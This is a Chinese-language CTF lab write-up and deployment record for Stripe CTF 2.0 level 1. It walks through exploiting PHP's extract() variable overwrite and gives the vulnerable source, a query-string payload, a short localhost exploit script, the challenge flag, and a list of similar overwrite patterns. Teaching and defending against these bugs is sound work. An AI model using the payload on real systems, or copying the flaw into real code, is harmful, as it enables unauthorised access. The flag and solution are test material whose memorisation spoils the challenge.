文档变更记录

（A：增加、M：修改、D：删除）

| 编号     | 状态   | 参与者  | 日期         | 难度   | 其他     |
| ------ | ---- | ---- | ---------- | ---- | ------ |
| web\_3 | A    | 张浩凌  | 2016.11.24 | 简单   | 第一批第三道 |
|        |      |      |            |      |        |
|        |      |      |            |      |        |
|        |      |      |            |      |        |
|        |      |      |            |      |        |
|        |      |      |            |      |        |
|        |      |      |            |      |        |
|        |      |      |            |      |        |

##一．**题目信息：**

1. 题目来源：

   STRIPE CTF 2.0  level 1(WEB)

2. 题目源码：

   https://github.com/evandrix/stripe-ctf-web-2012/tree/master/level01-code

3. 题目搭建环境：

   Ubuntu 14.04 + apache +php (无版本要求)

4. 题目描述：

   提供源代码在hint.txt中

5. 题目标签：

   WhiteBox,php extract函数，php变量覆盖

6. Exp下载：

   https://pan.baidu.com/s/1nu9ssnJ/

7. flag设置：

   flag{df6e4c09dc6f7a0a30e706f3304fd3c4}

##二．实验原理知识介绍：

	分析源码，发现存在php extract函数，针对该函数构造相应payload可以覆盖系统相关变量。

	通过提交空的attempt和不存在的文件，最终获取flag。


##三．实验操作步骤与讲解：

1.查看题目所给的源代码：

```php
 <?php
      $filename = '*******.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('*******.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>
```

从所给的源代码中我们看出了以下几个问题：

a.代码逻辑：代码从某个文件中读出鉴权信息，然后与用户通过GET提交的信息进行对比，如满足相等条件，则输出flag；

b.我们没有办法获取鉴权文件的内容，也就没有办法按正常逻辑获取flag；

c.发现php的extract函数，extract的函数声明如下：

int **extract** ( array &$var_array [, int $extract_type* = EXTR_OVERWRITE* [, string $prefix* = *NULL ]] )

extract函数可以把变量从一个数组中导入到当前命名空间符号表，如果extract_type没有声明，则默认会进行变量覆写（EXTR_OVERWRITE)。此处没有指定extract_type，所以存在PHP变量覆盖漏洞。

2.payload构造：

我们构造一个`$filename`变量，通过get提交，用于覆盖掉原先的`$filename`，此处可以构造一个不存在的文件，filename=file_that_does_not_exist.txt，这样通过file_get_contents获取到的文件内容为false，最终通过trim函数获得的内容为空字符串。这样，我们提交的attempt内容为空即可。

所以，最终生成的payloay为：

`attempt=&filename=filename=file_that_does_not_exist.txt`

3.EXP运行结果：

exp代码如下所示：

```python
#!/usr/bin/env python
from http import http
url = '/index.php？attempt=&filename=file_that_does_not_exist.txt'
print http('get','127.0.0.1',8081,url,'',{})[330:368]
```

运行结果如下：

 ![1](jpg\1.jpg)

##四.实验结果与分析:

	通过本次实验，我们重点学习和掌握了最简单的php变量覆盖漏洞的利用。通过extract函数，我们可以构造任意的参数来操控被系统写死的内容，从而改变函数的运行流程或者输入输出。通常变量覆盖有如下利用场景：
	1.替换session，到达获取任意用户身份及权限的能力；
	2.替换关键判断变量，达到控制程序运行流程的能力；
	3.替换普通字符串变量，实现特殊的sql注入，命令执行等攻击手法。

##五．**知识延拓：**


	常见的变量覆盖代码及配置：
	1.全局变量覆盖
	register_global=ON
	
	2.extract()变量覆盖
	如本题所示，不在赘述
	
	3.遍历初始化变量
	 foreach($_POST as $key => $value){  
	        $$key = $value;  
	    }  
	    
	4.import_request_variables变量覆盖
	import_request_variables('G');  //将GET变量导入到全局作用域中
	
	5.parse_str()变量覆盖
	将字符串解析成多个变量，如果参数str是URL传递入的查询字符串（query string），则将它解析为变量并设置到当前作用域。
	parse_str($_SERVER['QUERY_STRING']); 


##**六．参考资料：**
	PHP variable coverage: 	http://blog.csdn.net/hitwangpeng/article/details/45972099


##**七．题目部署：**

`Dockerfile：`
`# Author: haozi@nsc`
`# Base image to use, this must be set as the first line`
`#FROM web_14.04:latest`
`FROM web_14.04:test`
`#something you want to install`
`#example:`
`#apt-get install git nodejs`
`# Set config file`
`#run it with to set up the volume: docker run -v /src/path:/var/www/html`
`#mv /var/www/html/config /root/config`
`#cp /root/config/php.ini /etc/apache2/php.ini`
`#Set code file`
`#RUN chmod 777 /var/www/html/icq/2/` 
`#RUN chmod 777 /var/www/html/icq/4/upload`
`#start service or something(absolute path)`
`ENTRYPOINT  /var/www/html/start.sh ; /bin/bash`

**备注：**

	1. Docker run时把代码文件数据卷直接挂载到/var/www/html即可；
	2. Web_14.04为php+mysql+ubuntu14.04，因为很常见，所以可以直接用已有	的，但请注意控制php的版本；






